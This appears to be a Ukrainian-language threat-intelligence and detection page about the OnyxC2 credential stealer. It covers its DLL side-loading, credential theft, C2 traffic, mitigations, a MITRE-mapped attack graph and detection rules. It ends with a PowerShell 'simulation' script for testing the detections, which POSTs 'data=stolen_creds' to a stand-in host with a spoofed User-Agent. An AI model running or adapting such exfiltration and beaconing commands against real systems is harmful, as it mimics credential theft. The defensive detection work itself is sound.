Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
OnyxC2 – це нова платформа зловмисного ПЗ як послуга, спрямована на крадіжку облікових даних, двофакторних аутентифікаційних розширень та криптовалютних гаманців у понад 210 додатках. Платформа пропонує повний комерційний набір інструментів, включаючи панель управління, генератор та функціонал віддаленого доступу. Вона також базується на передових методах ухилення, включаючи завантаження DLL-підпліток з використанням перевищених підписаних бінарних файлів та зашифрованих компонентів завантажень.
Розслідування
Дослідники BlackFog вивчили кілька зразків OnyxC2 і виявили метод завантаження DLL, що зловживає підписаним хост-екзешаблом поряд з шкідливим DLL розміром понад 120 MB, замаскованим під бібліотеку графіки NVIDIA. Аналіз мережі показав, що зловмисне ПЗ спілкується через HTTPS з певною API точкою на бекенд. Дослідники також виявили зашифровані накладення, вбудовані в DLL, що допомагають зловмисному ПЗ уникати простого статичного аналізу.
Пом’якшення
Розгортання контролю ексфільтрації даних на кінцевій точці може допомогти блокувати несанкціонований вихідний трафік незалежно від того, який процес використовується. Безпекові команди повинні відслідковувати підозрілі завантаження DLL, пов’язані з підписаними бінарними файлами, та досліджувати незвично великі файли, що з’являються у шляхах, доступних для запису користувача. Сильні політики контролю додатків і відслідковування несанкціонованих запланованих завдань також рекомендуються.
Відповідь
Якщо виявлено активність OnyxC2, негайно ізолюйте уражену систему, щоб зупинити подальше викрадення даних. Захопіть повний дамп пам’яті, щоб відновити розшифроване завантаження та перевірити наявність активних сесій HVNC або діяльність проксі SOCKS5. Перевірте всі останні створені заплановані завдання та перевірте сховища облікових даних браузера на наявність слідів компрометації.
graph TB %% Визначення класів classDef action fill:#99ccff classDef builtin fill:#cccccc classDef malware fill:#ff9999 classDef discovery fill:#ccffcc classDef exfiltration fill:#ffff99 %% Початковий доступ і виконання action_user_exec[“<b>Дія</b> – <b idea=’T1204.002’>Виконання користувачем: Шкідливий файл</b><br/>Опис: Жертв спонукають завантажити<br/>архіви, захищені паролем, які містять<br/>шкідливі інсталятори, замасковані під легітимне програмне забезпечення.”] class action_user_exec action action_side_loading[“<b idea=’T1574.002’>Перехоплення потоку виконання: DLL Side-Loading</b><br/>Опис: Використовує легітимний цифрово підписаний<br/>виконуваний файл для завантаження шкідливої, штучно збільшеної DLL<br/>з назвою borlndmm.dll.”] class action_side_loading action malware_dll[“<b idea=’T1027.001’>Обфусковані файли або інформація: Бінарне доповнення</b><br/>Опис: DLL збільшена до понад 120 МБ та містить<br/>легітимні графічні функції NVIDIA для<br/>обходу засобів безпекового сканування.”] class malware_dll malware %% Закріплення та командно-контрольний зв’язок action_persistence[“<b idea=’T1547’>Закріплення</b><br/>Опис: Використовує додаткові можливості<br/>автозапуску через заплановані завдання.”] class action_persistence action action_c2[“<b idea=’T1071.001’>Командування та керування: Протокол прикладного рівня</b><br/>Опис: Надсилання beacon-запитів до серверної частини через HTTPS за адресою<br/>/backend/api/app.php, часто із використанням Cloudflare<br/>для приховування активності.”] class action_c2 action %% Розвідка та доступ до облікових даних action_discovery[“<b idea=’T1217’>Розвідка</b><br/>Опис: Збирає інформацію з браузерів, включаючи<br/>збережені облікові дані та cookie з 45 різних браузерів<br/>на базі Chromium і Gecko.”] class action_discovery discovery action_cred_mgr[“<b idea=’T1555.005’>Доступ до облікових даних: Дані менеджерів паролів</b><br/>Опис: Націлюється на 5 різних програм<br/>для керування паролями з метою викрадення облікових даних.”] class action_cred_mgr discovery action_lsass[“<b idea=’T1003.001’>Доступ до облікових даних: Вивантаження облікових даних ОС</b><br/>Опис: Виконує дамп пам’яті LSASS для отримання<br/>облікових даних.”] class action_lsass discovery %% Ексфільтрація action_exfil[“<b idea=’T1041’>Ексфільтрація через канал C2</b><br/>Опис: Викрадені дані, включаючи паролі, cookie<br/>та інформацію про криптогаманці, завантажуються через<br/>запит action=up_d.”] class action_exfil exfiltration %% Ланцюг зв’язків action_user_exec –>|призводить_до| action_side_loading action_side_loading –>|використовує| malware_dll malware_dll –>|створює| action_persistence action_persistence –>|ініціює| action_c2 action_c2 –>|запускає| action_discovery action_discovery –>|призводить_до| action_cred_mgr action_discovery –>|призводить_до| action_lsass action_cred_mgr –>|надає_дані_для| action_exfil action_lsass –>|надає_дані_для| action_exfil action_exfil –>|використовує_для_зв’язку| action_c2
Потік атаки
Виявлення
Підозріле командне управління і, контроль за допомогою запиту DNS незвичайного доменного рівня (TLD) (через dns)
Перегляд
IOCs (HashSha256) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
IOCs (SourceIP) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
IOCs (DestinationIP) для виявлення: Всередині OnyxC2: Новий стілер, що цілеиться на 210 додатків
Перегляд
Виявлення комунікацій OnyxC2 Stealer C2 та анонімізації через TOR [Проксі]
Перегляд
Виявлення запланованого автозапуску завдань OnyxC2 та активності кейлоггера [Створення процесу Windows]
Перегляд
Виконання симуляції
Передумова: Перевірка телеметрії та базових налаштувань повинна бути успішно завершена.
Обґрунтування: Цей розділ докладно описує точне виконання техніки противника (TTP), призначеної для запуску правила виявлення. Команди і розповідь МАЮТЬ безпосередньо відповідати визначеним TTP і спрямовані на генерування точної телеметрії, яку очікує логіка виявлення. Абстрактні або несумісні приклади призведуть до неправильного діагнозу.
-
Розповідь про атаку та команди: Противник прагне ексфільтрувати викрадені облікові дані браузера. Щоб уникнути виявлення моніторингом мережевої безпеки, вони розгортатимуть портативний двійковий Tor для створення анонімного тунелю. Як тільки тунель встановлений, зловмисне ПЗ починає з’єднання з його сервером Командування та Контролю (C2). Щоб влитися в легітимний веб-трафік, зловмисне ПЗ фальшує свій User-Agent, щоб виглядати як “Cloudflare” і націлюється на специфічну API точку, розміщену за проксі Cloudflare. Ця послідовність призначена для активації кореляції в правилах виявлення
torаргументів командного рядка та специфічної/backend/api/app.phpшаблон URL. -
Сценарій регресійного тестування:
# Симуляція комунікації OnyxC2 Stealer # 1. Симулювати наявність Tor (Створення фіктивного файлу/поведінки процесу) # У реальному сценарії це буде фактичний tor.exe $TorPath = "$env:TEMPtor.exe" "Симульований вміст бінарного Tor" | Out-File -FilePath $TorPath # Створити подію виконання процесу для 'tor' через командний рядок Start-Process -FilePath "cmd.exe" -ArgumentList "/c echo running tor service" -WindowStyle Hidden # Щоб забезпечити логіку виявлення 'command_line|contains: tor' активується, # ми виконуємо команду, що містить рядок 'tor' cmd.exe /c "echo initializing tor proxy..." # 2. Симулювати мережеве з'єднання C2 # Ми використовуємо PowerShell для симуляції мережевого з'єднання з певною URL-адресою і User-Agent $C2Url = "https://cloudflare-proxy-mock.com/backend/api/app.php" $UserAgent = "Cloudflare-Proxy-Agent/1.0" Write-Host "Спроба зв'язку C2 з $C2Url" Invoke-WebRequest -Uri $C2Url -UserAgent $UserAgent -Method Post -Body "data=stolen_creds" -ErrorAction SilentlyContinue -
Команди очищення:
# Видалення симульованих артефактів Remove-Item -Path "$env:TEMPtor.exe" -Force -ErrorAction SilentlyContinue Write-Host "Очищення симуляції завершено."